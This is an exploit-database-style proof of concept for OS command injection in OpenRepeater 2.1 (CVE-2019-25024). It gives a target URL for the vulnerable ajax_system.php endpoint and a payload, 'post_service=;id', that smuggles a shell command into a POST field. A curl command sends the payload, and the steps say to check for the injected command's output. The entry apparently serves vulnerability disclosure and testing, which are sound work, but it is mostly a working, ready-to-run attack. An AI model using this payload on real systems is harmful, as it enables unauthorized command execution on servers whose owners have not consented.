# Exploit Title: OpenRepeater 2.1 - OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 # The target URL for the vulnerable endpoint TARGET_URL="http://openrepeater/functions/ajax_system.php" # The payload to execute an arbitrary command, e.g., 'id' to demonstrate the vulnerability PAYLOAD="post_service=;id" # Sending the payload using curl curl -X POST -d "$PAYLOAD" "$TARGET_URL" Steps to Reproduce: 1. Send the POST request. 2. Observe the result and injected command (e.g., uid=...) will appear.